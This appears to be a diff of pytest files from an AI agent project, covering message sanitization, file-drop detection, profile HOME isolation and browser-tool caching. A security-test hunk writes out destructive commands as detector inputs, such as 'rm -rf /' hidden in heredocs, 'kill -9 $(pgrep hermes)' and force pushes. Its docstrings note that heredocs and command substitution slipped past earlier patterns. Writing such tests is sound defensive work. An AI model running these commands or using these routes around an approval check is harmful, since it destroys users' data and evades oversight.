"name": "read_file",
|
||||
"arguments": '{"path": "⚕test.txt"}'
|
||||
}
|
||||
}]
|
||||
}]
|
||||
assert _sanitize_messages_non_ascii(messages) is True
|
||||
assert messages[0]["tool_calls"][0]["function"]["arguments"] == '{"path": "test.txt"}'
|
||||
|
||||
def test_handles_non_dict_messages(self):
|
||||
messages = ["not a dict", {"role": "user", "content": "hello"}]
|
||||
assert _sanitize_messages_non_ascii(messages) is False
|
||||
|
||||
def test_empty_messages(self):
|
||||
assert _sanitize_messages_non_ascii([]) is False
|
||||
|
||||
def test_multiple_messages(self):
|
||||
messages = [
|
||||
{"role": "system", "content": "⚕ System prompt"},
|
||||
{"role": "user", "content": "Hello 你好"},
|
||||
{"role": "assistant", "content": "Hi there!"},
|
||||
]
|
||||
assert _sanitize_messages_non_ascii(messages) is True
|
||||
assert messages[0]["content"] == " System prompt"
|
||||
assert messages[1]["content"] == "Hello "
|
||||
assert messages[2]["content"] == "Hi there!"
|
||||
|
||||
|
||||
class TestSurrogateVsAsciiSanitization:
|
||||
"""Test that surrogate and ASCII sanitization work independently."""
|
||||
|
||||
def test_surrogates_still_handled(self):
|
||||
"""Surrogates are caught by _sanitize_messages_surrogates, not _non_ascii."""
|
||||
msg_with_surrogate = "test \ud800 end"
|
||||
messages = [{"role": "user", "content": msg_with_surrogate}]
|
||||
assert _sanitize_messages_surrogates(messages) is True
|
||||
assert "\ud800" not in messages[0]["content"]
|
||||
assert "\ufffd" in messages[0]["content"]
|
||||
|
||||
def test_surrogates_in_name_and_tool_calls_are_sanitized(self):
|
||||
messages = [{
|
||||
"role": "assistant",
|
||||
"name": "bad\ud800name",
|
||||
"content": None,
|
||||
"tool_calls": [{
|
||||
"id": "call_\ud800",
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": "read\ud800_file",
|
||||
"arguments": '{"path": "bad\ud800.txt"}'
|
||||
}
|
||||
}],
|
||||
}]
|
||||
assert _sanitize_messages_surrogates(messages) is True
|
||||
assert "\ud800" not in messages[0]["name"]
|
||||
assert "\ud800" not in messages[0]["tool_calls"][0]["id"]
|
||||
assert "\ud800" not in messages[0]["tool_calls"][0]["function"]["name"]
|
||||
assert "\ud800" not in messages[0]["tool_calls"][0]["function"]["arguments"]
|
||||
|
||||
def test_ascii_codec_strips_all_non_ascii(self):
|
||||
"""ASCII codec case: all non-ASCII is stripped, not replaced."""
|
||||
messages = [{"role": "user", "content": "test ⚕🤖你好 end"}]
|
||||
assert _sanitize_messages_non_ascii(messages) is True
|
||||
# All non-ASCII chars removed; spaces around them collapse
|
||||
assert messages[0]["content"] == "test end"
|
||||
|
||||
def test_no_surrogates_returns_false(self):
|
||||
"""When no surrogates present, _sanitize_messages_surrogates returns False."""
|
||||
messages = [{"role": "user", "content": "hello ⚕ world"}]
|
||||
assert _sanitize_messages_surrogates(messages) is False
|
||||
@@ -0,0 +1,176 @@
|
||||
"""Tests for _detect_file_drop — file path detection that prevents
|
||||
dragged/pasted absolute paths from being mistaken for slash commands."""
|
||||
|
||||
import os
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from cli import _detect_file_drop
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fixtures
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@pytest.fixture()
|
||||
def tmp_image(tmp_path):
|
||||
"""Create a temporary .png file and return its path."""
|
||||
img = tmp_path / "screenshot.png"
|
||||
img.write_bytes(b"\x89PNG\r\n\x1a\n") # minimal PNG header
|
||||
return img
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def tmp_text(tmp_path):
|
||||
"""Create a temporary .py file and return its path."""
|
||||
f = tmp_path / "main.py"
|
||||
f.write_text("print('hello')\n")
|
||||
return f
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def tmp_image_with_spaces(tmp_path):
|
||||
"""Create a file whose name contains spaces (like macOS screenshots)."""
|
||||
img = tmp_path / "Screenshot 2026-04-01 at 7.25.32 PM.png"
|
||||
img.write_bytes(b"\x89PNG\r\n\x1a\n")
|
||||
return img
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests: returns None for non-file inputs
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestNonFileInputs:
|
||||
def test_regular_slash_command(self):
|
||||
assert _detect_file_drop("/help") is None
|
||||
|
||||
def test_unknown_slash_command(self):
|
||||
assert _detect_file_drop("/xyz") is None
|
||||
|
||||
def test_slash_command_with_args(self):
|
||||
assert _detect_file_drop("/config set key value") is None
|
||||
|
||||
def test_empty_string(self):
|
||||
assert _detect_file_drop("") is None
|
||||
|
||||
def test_non_slash_input(self):
|
||||
assert _detect_file_drop("hello world") is None
|
||||
|
||||
def test_non_string_input(self):
|
||||
assert _detect_file_drop(42) is None
|
||||
|
||||
def test_nonexistent_path(self):
|
||||
assert _detect_file_drop("/nonexistent/path/to/file.png") is None
|
||||
|
||||
def test_directory_not_file(self, tmp_path):
|
||||
"""A directory path should not be treated as a file drop."""
|
||||
assert _detect_file_drop(str(tmp_path)) is None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests: image file detection
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestImageFileDrop:
|
||||
def test_simple_image_path(self, tmp_image):
|
||||
result = _detect_file_drop(str(tmp_image))
|
||||
assert result is not None
|
||||
assert result["path"] == tmp_image
|
||||
assert result["is_image"] is True
|
||||
assert result["remainder"] == ""
|
||||
|
||||
def test_image_with_trailing_text(self, tmp_image):
|
||||
user_input = f"{tmp_image} analyze this please"
|
||||
result = _detect_file_drop(user_input)
|
||||
assert result is not None
|
||||
assert result["path"] == tmp_image
|
||||
assert result["is_image"] is True
|
||||
assert result["remainder"] == "analyze this please"
|
||||
|
||||
@pytest.mark.parametrize("ext", [".png", ".jpg", ".jpeg", ".gif", ".webp",
|
||||
".bmp", ".tiff", ".tif", ".svg", ".ico"])
|
||||
def test_all_image_extensions(self, tmp_path, ext):
|
||||
img = tmp_path / f"test{ext}"
|
||||
img.write_bytes(b"fake")
|
||||
result = _detect_file_drop(str(img))
|
||||
assert result is not None
|
||||
assert result["is_image"] is True
|
||||
|
||||
def test_uppercase_extension(self, tmp_path):
|
||||
img = tmp_path / "photo.JPG"
|
||||
img.write_bytes(b"fake")
|
||||
result = _detect_file_drop(str(img))
|
||||
assert result is not None
|
||||
assert result["is_image"] is True
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests: non-image file detection
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestNonImageFileDrop:
|
||||
def test_python_file(self, tmp_text):
|
||||
result = _detect_file_drop(str(tmp_text))
|
||||
assert result is not None
|
||||
assert result["path"] == tmp_text
|
||||
assert result["is_image"] is False
|
||||
assert result["remainder"] == ""
|
||||
|
||||
def test_non_image_with_trailing_text(self, tmp_text):
|
||||
user_input = f"{tmp_text} review this code"
|
||||
result = _detect_file_drop(user_input)
|
||||
assert result is not None
|
||||
assert result["is_image"] is False
|
||||
assert result["remainder"] == "review this code"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests: backslash-escaped spaces (macOS drag-and-drop)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestEscapedSpaces:
|
||||
def test_escaped_spaces_in_path(self, tmp_image_with_spaces):
|
||||
r"""macOS drags produce paths like /path/to/my\ file.png"""
|
||||
escaped = str(tmp_image_with_spaces).replace(' ', '\\ ')
|
||||
result = _detect_file_drop(escaped)
|
||||
assert result is not None
|
||||
assert result["path"] == tmp_image_with_spaces
|
||||
assert result["is_image"] is True
|
||||
|
||||
def test_escaped_spaces_with_trailing_text(self, tmp_image_with_spaces):
|
||||
escaped = str(tmp_image_with_spaces).replace(' ', '\\ ')
|
||||
user_input = f"{escaped} what is this?"
|
||||
result = _detect_file_drop(user_input)
|
||||
assert result is not None
|
||||
assert result["path"] == tmp_image_with_spaces
|
||||
assert result["remainder"] == "what is this?"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests: edge cases
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestEdgeCases:
|
||||
def test_path_with_no_extension(self, tmp_path):
|
||||
f = tmp_path / "Makefile"
|
||||
f.write_text("all:\n\techo hi\n")
|
||||
result = _detect_file_drop(str(f))
|
||||
assert result is not None
|
||||
assert result["is_image"] is False
|
||||
|
||||
def test_path_that_looks_like_command_but_is_file(self, tmp_path):
|
||||
"""A file literally named 'help' inside a directory starting with /."""
|
||||
f = tmp_path / "help"
|
||||
f.write_text("not a command\n")
|
||||
result = _detect_file_drop(str(f))
|
||||
assert result is not None
|
||||
assert result["is_image"] is False
|
||||
|
||||
def test_symlink_to_file(self, tmp_image, tmp_path):
|
||||
link = tmp_path / "link.png"
|
||||
link.symlink_to(tmp_image)
|
||||
result = _detect_file_drop(str(link))
|
||||
assert result is not None
|
||||
assert result["is_image"] is True
|
||||
@@ -0,0 +1,62 @@
|
||||
"""Tests for hermes_constants module."""
|
||||
|
||||
import os
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
from hermes_constants import get_default_hermes_root
|
||||
|
||||
|
||||
class TestGetDefaultHermesRoot:
|
||||
"""Tests for get_default_hermes_root() — Docker/custom deployment awareness."""
|
||||
|
||||
def test_no_hermes_home_returns_native(self, tmp_path, monkeypatch):
|
||||
"""When HERMES_HOME is not set, returns ~/.hermes."""
|
||||
monkeypatch.delenv("HERMES_HOME", raising=False)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
assert get_default_hermes_root() == tmp_path / ".hermes"
|
||||
|
||||
def test_hermes_home_is_native(self, tmp_path, monkeypatch):
|
||||
"""When HERMES_HOME = ~/.hermes, returns ~/.hermes."""
|
||||
native = tmp_path / ".hermes"
|
||||
native.mkdir()
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(native))
|
||||
assert get_default_hermes_root() == native
|
||||
|
||||
def test_hermes_home_is_profile(self, tmp_path, monkeypatch):
|
||||
"""When HERMES_HOME is a profile under ~/.hermes, returns ~/.hermes."""
|
||||
native = tmp_path / ".hermes"
|
||||
profile = native / "profiles" / "coder"
|
||||
profile.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(profile))
|
||||
assert get_default_hermes_root() == native
|
||||
|
||||
def test_hermes_home_is_docker(self, tmp_path, monkeypatch):
|
||||
"""When HERMES_HOME points outside ~/.hermes (Docker), returns HERMES_HOME."""
|
||||
docker_home = tmp_path / "opt" / "data"
|
||||
docker_home.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(docker_home))
|
||||
assert get_default_hermes_root() == docker_home
|
||||
|
||||
def test_hermes_home_is_custom_path(self, tmp_path, monkeypatch):
|
||||
"""Any HERMES_HOME outside ~/.hermes is treated as the root."""
|
||||
custom = tmp_path / "my-hermes-data"
|
||||
custom.mkdir()
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(custom))
|
||||
assert get_default_hermes_root() == custom
|
||||
|
||||
def test_docker_profile_active(self, tmp_path, monkeypatch):
|
||||
"""When a Docker profile is active (HERMES_HOME=<root>/profiles/<name>),
|
||||
returns the Docker root, not the profile dir."""
|
||||
docker_root = tmp_path / "opt" / "data"
|
||||
profile = docker_root / "profiles" / "coder"
|
||||
profile.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(profile))
|
||||
assert get_default_hermes_root() == docker_root
|
||||
@@ -11,12 +11,19 @@ def _load_optional_dependencies():
|
||||
return project["optional-dependencies"]
|
||||
|
||||
|
||||
def test_matrix_extra_exists_but_excluded_from_all():
|
||||
def test_matrix_extra_linux_only_in_all():
|
||||
"""matrix-nio[e2e] depends on python-olm which is upstream-broken on modern
|
||||
macOS (archived libolm, C++ errors with Clang 21+). The [matrix] extra is
|
||||
kept for opt-in install but deliberately excluded from [all] so one broken
|
||||
upstream dep doesn't nuke every other extra during ``hermes update``."""
|
||||
included in [all] but gated to Linux via a platform marker so that
|
||||
``hermes update`` doesn't fail on macOS."""
|
||||
optional_dependencies = _load_optional_dependencies()
|
||||
|
||||
assert "matrix" in optional_dependencies
|
||||
# Must NOT be unconditional — python-olm has no macOS wheels.
|
||||
assert "hermes-agent[matrix]" not in optional_dependencies["all"]
|
||||
# Must be present with a Linux platform marker.
|
||||
linux_gated = [
|
||||
dep for dep in optional_dependencies["all"]
|
||||
if "matrix" in dep and "linux" in dep
|
||||
]
|
||||
assert linux_gated, "expected hermes-agent[matrix] with sys_platform=='linux' marker in [all]"
|
||||
|
||||
@@ -0,0 +1,198 @@
|
||||
"""Tests for per-profile subprocess HOME isolation (#4426).
|
||||
|
||||
Verifies that subprocesses (terminal, execute_code, background processes)
|
||||
receive a per-profile HOME directory while the Python process's own HOME
|
||||
and Path.home() remain unchanged.
|
||||
|
||||
See: https://github.com/NousResearch/hermes-agent/issues/4426
|
||||
"""
|
||||
|
||||
import os
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# get_subprocess_home()
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestGetSubprocessHome:
|
||||
"""Unit tests for hermes_constants.get_subprocess_home()."""
|
||||
|
||||
def test_returns_none_when_hermes_home_unset(self, monkeypatch):
|
||||
monkeypatch.delenv("HERMES_HOME", raising=False)
|
||||
from hermes_constants import get_subprocess_home
|
||||
assert get_subprocess_home() is None
|
||||
|
||||
def test_returns_none_when_home_dir_missing(self, tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
# No home/ subdirectory created
|
||||
from hermes_constants import get_subprocess_home
|
||||
assert get_subprocess_home() is None
|
||||
|
||||
def test_returns_path_when_home_dir_exists(self, tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
profile_home = hermes_home / "home"
|
||||
profile_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
from hermes_constants import get_subprocess_home
|
||||
assert get_subprocess_home() == str(profile_home)
|
||||
|
||||
def test_returns_profile_specific_path(self, tmp_path, monkeypatch):
|
||||
"""Named profiles get their own isolated HOME."""
|
||||
profile_dir = tmp_path / ".hermes" / "profiles" / "coder"
|
||||
profile_dir.mkdir(parents=True)
|
||||
profile_home = profile_dir / "home"
|
||||
profile_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(profile_dir))
|
||||
from hermes_constants import get_subprocess_home
|
||||
assert get_subprocess_home() == str(profile_home)
|
||||
|
||||
def test_two_profiles_get_different_homes(self, tmp_path, monkeypatch):
|
||||
base = tmp_path / ".hermes" / "profiles"
|
||||
for name in ("alpha", "beta"):
|
||||
p = base / name
|
||||
p.mkdir(parents=True)
|
||||
(p / "home").mkdir()
|
||||
|
||||
from hermes_constants import get_subprocess_home
|
||||
|
||||
monkeypatch.setenv("HERMES_HOME", str(base / "alpha"))
|
||||
home_a = get_subprocess_home()
|
||||
|
||||
monkeypatch.setenv("HERMES_HOME", str(base / "beta"))
|
||||
home_b = get_subprocess_home()
|
||||
|
||||
assert home_a != home_b
|
||||
assert home_a.endswith("alpha/home")
|
||||
assert home_b.endswith("beta/home")
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _make_run_env() injection
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestMakeRunEnvHomeInjection:
|
||||
"""Verify _make_run_env() injects HOME into subprocess envs."""
|
||||
|
||||
def test_injects_home_when_profile_home_exists(self, tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir()
|
||||
(hermes_home / "home").mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
monkeypatch.setenv("HOME", "/root")
|
||||
monkeypatch.setenv("PATH", "/usr/bin:/bin")
|
||||
|
||||
from tools.environments.local import _make_run_env
|
||||
result = _make_run_env({})
|
||||
|
||||
assert result["HOME"] == str(hermes_home / "home")
|
||||
|
||||
def test_no_injection_when_home_dir_missing(self, tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir()
|
||||
# No home/ subdirectory
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
monkeypatch.setenv("HOME", "/root")
|
||||
monkeypatch.setenv("PATH", "/usr/bin:/bin")
|
||||
|
||||
from tools.environments.local import _make_run_env
|
||||
result = _make_run_env({})
|
||||
|
||||
assert result["HOME"] == "/root"
|
||||
|
||||
def test_no_injection_when_hermes_home_unset(self, monkeypatch):
|
||||
monkeypatch.delenv("HERMES_HOME", raising=False)
|
||||
monkeypatch.setenv("HOME", "/home/user")
|
||||
monkeypatch.setenv("PATH", "/usr/bin:/bin")
|
||||
|
||||
from tools.environments.local import _make_run_env
|
||||
result = _make_run_env({})
|
||||
|
||||
assert result["HOME"] == "/home/user"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _sanitize_subprocess_env() injection
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestSanitizeSubprocessEnvHomeInjection:
|
||||
"""Verify _sanitize_subprocess_env() injects HOME for background procs."""
|
||||
|
||||
def test_injects_home_when_profile_home_exists(self, tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir()
|
||||
(hermes_home / "home").mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
base_env = {"HOME": "/root", "PATH": "/usr/bin", "USER": "root"}
|
||||
from tools.environments.local import _sanitize_subprocess_env
|
||||
result = _sanitize_subprocess_env(base_env)
|
||||
|
||||
assert result["HOME"] == str(hermes_home / "home")
|
||||
|
||||
def test_no_injection_when_home_dir_missing(self, tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
base_env = {"HOME": "/root", "PATH": "/usr/bin"}
|
||||
from tools.environments.local import _sanitize_subprocess_env
|
||||
result = _sanitize_subprocess_env(base_env)
|
||||
|
||||
assert result["HOME"] == "/root"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Profile bootstrap
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestProfileBootstrap:
|
||||
"""Verify new profiles get a home/ subdirectory."""
|
||||
|
||||
def test_profile_dirs_includes_home(self):
|
||||
from hermes_cli.profiles import _PROFILE_DIRS
|
||||
assert "home" in _PROFILE_DIRS
|
||||
|
||||
def test_create_profile_bootstraps_home_dir(self, tmp_path, monkeypatch):
|
||||
"""create_profile() should create home/ inside the profile dir."""
|
||||
home = tmp_path / ".hermes"
|
||||
home.mkdir()
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(home))
|
||||
|
||||
from hermes_cli.profiles import create_profile
|
||||
profile_dir = create_profile("testbot", no_alias=True)
|
||||
assert (profile_dir / "home").is_dir()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Python process HOME unchanged
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestPythonProcessUnchanged:
|
||||
"""Confirm the Python process's own HOME is never modified."""
|
||||
|
||||
def test_path_home_unchanged_after_subprocess_home_resolved(
|
||||
self, tmp_path, monkeypatch
|
||||
):
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir()
|
||||
(hermes_home / "home").mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
original_home = os.environ.get("HOME")
|
||||
original_path_home = str(Path.home())
|
||||
|
||||
from hermes_constants import get_subprocess_home
|
||||
sub_home = get_subprocess_home()
|
||||
|
||||
# Subprocess home is set but Python HOME stays the same
|
||||
assert sub_home is not None
|
||||
assert os.environ.get("HOME") == original_home
|
||||
assert str(Path.home()) == original_path_home
|
||||
@@ -649,3 +649,172 @@ class TestNormalizationBypass:
|
||||
assert dangerous is False
|
||||
|
||||
|
||||
class TestHeredocScriptExecution:
|
||||
"""Script execution via heredoc bypasses the -e/-c flag patterns.
|
||||
|
||||
`python3 << 'EOF'` feeds arbitrary code through stdin without any
|
||||
flag that the original patterns check for. See security audit Test 3.
|
||||
"""
|
||||
|
||||
def test_python3_heredoc_detected(self):
|
||||
# The heredoc body also contains `rm -rf /` which fires the
|
||||
# "delete in root path" pattern first (patterns are ordered).
|
||||
# The heredoc pattern also matches — either detection is correct.
|
||||
cmd = "python3 << 'EOF'\nimport os; os.system('rm -rf /')\nEOF"
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
|
||||
def test_python_heredoc_detected(self):
|
||||
cmd = 'python << "PYEOF"\nprint("pwned")\nPYEOF'
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
|
||||
def test_perl_heredoc_detected(self):
|
||||
cmd = "perl <<'END'\nsystem('whoami');\nEND"
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
|
||||
def test_ruby_heredoc_detected(self):
|
||||
cmd = "ruby <<RUBY\n`rm -rf /`\nRUBY"
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
|
||||
def test_node_heredoc_detected(self):
|
||||
cmd = "node << 'JS'\nrequire('child_process').execSync('whoami')\nJS"
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
|
||||
def test_python3_dash_c_still_detected(self):
|
||||
"""Existing -c pattern must not regress."""
|
||||
cmd = "python3 -c 'import os; os.system(\"rm -rf /\")'"
|
||||
dangerous, _, _ = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
|
||||
def test_safe_python_not_flagged(self):
|
||||
"""Plain 'python3 script.py' without heredoc or -c must stay safe."""
|
||||
cmd = "python3 my_script.py"
|
||||
dangerous, _, _ = detect_dangerous_command(cmd)
|
||||
assert dangerous is False
|
||||
|
||||
|
||||
class TestPgrepKillExpansion:
|
||||
"""kill -9 $(pgrep hermes) bypasses the pkill/killall name-matching
|
||||
pattern because the command substitution is opaque to regex.
|
||||
|
||||
See security audit Test 7.
|
||||
"""
|
||||
|
||||
def test_kill_dollar_pgrep_detected(self):
|
||||
cmd = 'kill -9 $(pgrep -f "hermes.*gateway")'
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
assert "pgrep" in desc.lower()
|
||||
|
||||
def test_kill_backtick_pgrep_detected(self):
|
||||
cmd = "kill -9 `pgrep hermes`"
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
|
||||
def test_kill_dollar_pgrep_no_flags(self):
|
||||
cmd = "kill $(pgrep gateway)"
|
||||
dangerous, _, _ = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
|
||||
def test_pkill_hermes_still_detected(self):
|
||||
"""Existing pkill pattern must not regress."""
|
||||
cmd = "pkill -9 hermes"
|
||||
dangerous, _, _ = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
|
||||
def test_safe_kill_pid_not_flagged(self):
|
||||
"""A plain 'kill 12345' (literal PID, no expansion) must stay safe."""
|
||||
cmd = "kill 12345"
|
||||
dangerous, _, _ = detect_dangerous_command(cmd)
|
||||
assert dangerous is False
|
||||
|
||||
|
||||
class TestGitDestructiveOps:
|
||||
"""git reset --hard, push --force, clean -f, branch -D can destroy
|
||||
work and rewrite shared history. Not covered by rm/chmod patterns.
|
||||
|
||||
See security audit Test 6.
|
||||
"""
|
||||
|
||||
def test_git_reset_hard_detected(self):
|
||||
cmd = "git reset --hard HEAD~3"
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
assert "reset" in desc.lower() or "hard" in desc.lower()
|
||||
|
||||
def test_git_push_force_detected(self):
|
||||
cmd = "git push --force origin main"
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
assert "force" in desc.lower()
|
||||
|
||||
def test_git_push_dash_f_detected(self):
|
||||
cmd = "git push -f origin main"
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
|
||||
def test_git_clean_force_detected(self):
|
||||
cmd = "git clean -fd"
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
assert "clean" in desc.lower()
|
||||
|
||||
def test_git_branch_force_delete_detected(self):
|
||||
cmd = "git branch -D feature-branch"
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
|
||||
def test_safe_git_status_not_flagged(self):
|
||||
cmd = "git status"
|
||||
dangerous, _, _ = detect_dangerous_command(cmd)
|
||||
assert dangerous is False
|
||||
|
||||
def test_safe_git_push_not_flagged(self):
|
||||
"""Normal push without --force must not be flagged."""
|
||||
cmd = "git push origin main"
|
||||
dangerous, _, _ = detect_dangerous_command(cmd)
|
||||
assert dangerous is False
|
||||
|
||||
def test_git_branch_lowercase_d_also_flagged(self):
|
||||
"""git branch -d triggers approval too — IGNORECASE is global.
|
||||
|
||||
This is intentional: -d is safer than -D but an approval prompt
|
||||
for branch deletion is reasonable. The user can still approve.
|
||||
"""
|
||||
cmd = "git branch -d feature-branch"
|
||||
dangerous, _, _ = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
|
||||
|
||||
class TestChmodExecuteCombo:
|
||||
"""chmod +x && ./ is the two-step social engineering pattern where a
|
||||
script is first made executable then immediately run. The script
|
||||
content may contain dangerous commands invisible to pattern matching.
|
||||
|
||||
See security audit Test 4.
|
||||
"""
|
||||
|
||||
def test_chmod_and_execute_detected(self):
|
||||
cmd = "chmod +x /tmp/cleanup.sh && ./cleanup.sh"
|
||||
dangerous, _, desc = detect_dangerous_command(cmd)
|
||||
assert dangerous is True
|
||||
assert "chmod" in desc.lower() or "execution" in desc.lower()
|
||||
|
||||
def test_chmod_semicolon_execute_detected(self):
|
||||
cmd = "chmod +x script.sh; ./script.sh"
|
||||
dangerous, _, _ = detect_dangerous_command(cmd)
|
||||
# Semicolon variant — pattern uses && but full-string match
|
||||
# on chmod +x should still trigger even without the && ./
|
||||
assert dangerous is True
|
||||
|
||||
def test_safe_chmod_without_execute_not_flagged(self):
|
||||
"""chmod +x alone without immediate execution must not be flagged."""
|
||||
cmd = "chmod +x script.sh"
|
||||
dangerous, _, _ = detect_dangerous_command(cmd)
|
||||
assert dangerous is False
|
||||
|
||||
|
||||
|
||||
@@ -0,0 +1,271 @@
|
||||
"""Tests for browser_tool.py hardening: caching, security, thread safety, truncation."""
|
||||
|
||||
import inspect
|
||||
import os
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _reset_caches():
|
||||
"""Reset all module-level caches so tests start clean."""
|
||||
import tools.browser_tool as bt
|
||||
bt._cached_agent_browser = None
|
||||
bt._agent_browser_resolved = False
|
||||
bt._cached_command_timeout = None
|
||||
bt._command_timeout_resolved = False
|
||||
# lru_cache for _discover_homebrew_node_dirs
|
||||
if hasattr(bt._discover_homebrew_node_dirs, "cache_clear"):
|
||||
bt._discover_homebrew_node_dirs.cache_clear()
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _clean_caches():
|
||||
_reset_caches()
|
||||
yield
|
||||
_reset_caches()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Dead code removal
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestDeadCodeRemoval:
|
||||
"""Verify dead code was actually removed."""
|
||||
|
||||
def test_no_default_session_timeout(self):
|
||||
import tools.browser_tool as bt
|
||||
assert not hasattr(bt, "DEFAULT_SESSION_TIMEOUT")
|
||||
|
||||
def test_browser_close_schema_removed(self):
|
||||
from tools.browser_tool import BROWSER_TOOL_SCHEMAS
|
||||
names = [s["name"] for s in BROWSER_TOOL_SCHEMAS]
|
||||
assert "browser_close" not in names
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Caching: _find_agent_browser
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestFindAgentBrowserCache:
|
||||
|
||||
def test_cached_after_first_call(self):
|
||||
import tools.browser_tool as bt
|
||||
with patch("shutil.which", return_value="/usr/bin/agent-browser"):
|
||||
result1 = bt._find_agent_browser()
|
||||
result2 = bt._find_agent_browser()
|
||||
assert result1 == result2 == "/usr/bin/agent-browser"
|
||||
assert bt._agent_browser_resolved is True
|
||||
|
||||
def test_cache_cleared_by_cleanup(self):
|
||||
import tools.browser_tool as bt
|
||||
bt._cached_agent_browser = "/fake/path"
|
||||
bt._agent_browser_resolved = True
|
||||
bt.cleanup_all_browsers()
|
||||
assert bt._agent_browser_resolved is False
|
||||
|
||||
